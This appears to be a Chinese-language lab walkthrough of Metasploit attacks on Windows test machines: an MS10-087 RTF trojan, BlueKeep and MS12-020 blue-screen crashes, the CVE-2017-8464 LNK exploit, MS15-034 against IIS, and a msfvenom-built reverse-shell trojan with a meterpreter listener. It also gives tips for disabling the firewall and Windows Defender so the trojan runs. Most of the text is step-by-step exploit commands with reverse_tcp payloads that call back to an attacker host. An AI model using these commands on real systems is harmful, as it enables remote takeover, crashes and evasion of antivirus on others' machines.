Msf攻击案例
注意:所有攻击前先要管防火墙!
msf 之ms10-087
输入命令
- search ms10-087;
- 使用这个模块:
Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
文章图片
image.png
看到一个文件
文章图片
改文件名
文章图片
image.png
软件捆绑,设置payload: set payload windows/exec
文章图片
image.png
调用cmd中的计算器
文章图片
image.png
我们运行下,文件已经在这个路径下面了。
文章图片
image.png
kail下面root文件显示隐藏文件?
文章图片
image.png
文章图片
image.png
root下→.msf4→local→pjy的木马文件放到桌面
文章图片
image.png
把木马放到winxp中 点rtf文件计算器打开
踩坑:复制的xp环境要重启一下才可以执行!!
文章图片
image.png
- 为实验成功先win7系统下关闭防火墙并开启3389端口
文章图片
image.png
文章图片
image.png - 如下命令操作
search 2019-0708
use 1
show options(查看使用说明)
set rdp_client_ip 192.168.117 (设置当前ip是被攻击的主机ip)
![]()
文章图片
image.png
![]()
文章图片
image.png
show options
set payload windows/x64/meterpreter/reverse_tcp #设置反向链接
![]()
文章图片
image.png
set lhost 192.168.1.119
set id 4
![]()
文章图片
image.png
exploit
set rhosts 192.168.1.117 (设置被攻击主机号)
exploit
check
set target 1
exploit (目标会蓝屏)成功导致被攻击的主机蓝屏
![Msf攻击案例](https://img.it610.com/image/info10/7f352e1690754149a3270340796e26b4.jpg)
文章图片
image.png msfCVE-2019-0708实例
- 先开启远程3389端口然后开始做攻击实验
命令如下:
search ms12-020震网三代
use 0
set rhosts 192.168.1.124 (攻击2003系统)
exploit(蓝屏)
![]()
文章图片
image.png
- 漏洞详情
北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).
CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
攻击机:kali
IP地址为:192.168.10.118
靶机:win7
IP地址:192.168.10.119
受影响的版本
Windows 7
Windows 8.1
Windows RT 8.1
Windows 10
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
- ms 2017_8464
search 2017_8464生成很多快捷方式,找到快捷方式可以存到U盘,可以单独拷贝出来有漏洞。
use 0
show options
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.1.117
run/exploit
![Msf攻击案例](https://img.it610.com/image/info10/a9765a6cf0a347f7a1e6e126f1816f7a.jpg)
文章图片
image.png
![Msf攻击案例](https://img.it610.com/image/info10/f85bf094e0454a52909f812371d9e967.jpg)
文章图片
image.png
![Msf攻击案例](https://img.it610.com/image/info10/74b6d00f4bb04ceb9adf56bfb92de64b.jpg)
文章图片
- kail木马生成使用
kail下操作
kail:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=4444 -f exe -o payload.exe(生成木马)
![Msf攻击案例](https://img.it610.com/image/info10/33931cbb431e4f7880bac37a90983896.jpg)
文章图片
image.png
kail:sz payload.exe 下载木马到桌面,此处踩坑——木马被查杀。
注意!踩坑:
尽管关闭了防火墙,但是生成的木马病毒被win10系统自带的查杀病毒给消灭了,关闭方式如下。
![Msf攻击案例](https://img.it610.com/image/info10/301c848a801d4d8a85a8b1ff8db44efb.jpg)
文章图片
image.png
![Msf攻击案例](https://img.it610.com/image/info10/7f68049ae0e348b5a2b12aec5e5344d1.jpg)
文章图片
image.png
![Msf攻击案例](https://img.it610.com/image/info10/cd3fd36d66bb48ae925b9768418c52f6.jpg)
文章图片
image.png
![Msf攻击案例](https://img.it610.com/image/info10/9e4f86ad89844c1f868c6bd07cba3c60.jpg)
文章图片
image.png 进入到msf下,
1.开启监听444端口:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.119
set lport 4444
exploit
当win7下点击木马,就可以监听运行
![Msf攻击案例](https://img.it610.com/image/info10/34615677f41a4e5c9bf623caa0fd980c.jpg)
文章图片
image.png ms15-034 (windows2008系统下运行)
现在windows sever 2008 r2 系统下安装iis 方法参考
[win2008系统创建iis流程]https://www.jianshu.com/p/44c503ed447d
![Msf攻击案例](https://img.it610.com/image/info10/0b7195f174f44a79a23da63e21a0a5df.png)
文章图片
image.png
ms15-034操作如下:
search ms15-034
use 0
set rhosts 192.168.1.4(win2008系统ip) 出现蓝屏重启
设置iis
![Msf攻击案例](https://img.it610.com/image/info10/af9d566ad2d54a2ebd0a86e107af19d3.jpg)
文章图片
image.png 【Msf攻击案例】更改为ip自动获取
![Msf攻击案例](https://img.it610.com/image/info10/ab11ffdeb93a44f3b22701e3f182456c.jpg)
文章图片
image.png
![Msf攻击案例](https://img.it610.com/image/info10/af26425e63864028be211b0842f9eebb.jpg)
文章图片
image.png
推荐阅读
- 翼光家长沙龙复盘
- 小程序有哪些低成本获客手段——案例解析
- 【文魁大脑实用记忆第五期】贤派张丽琼第8次案例一地理记忆有汽泡图
- W15L21-L22-电商企业案例分析
- 案例11(|案例11: “我们” 小成功关注个人,大成功关注大多数人)
- 简易有效Api接口防攻击策略
- 从正面管教看家庭案例
- 集合框架(集合嵌套存储和遍历元素的案例代码实现)
- 目标管理模型的应用案例
- 【时间的祝福】大连普兰店千套支行营销案例分享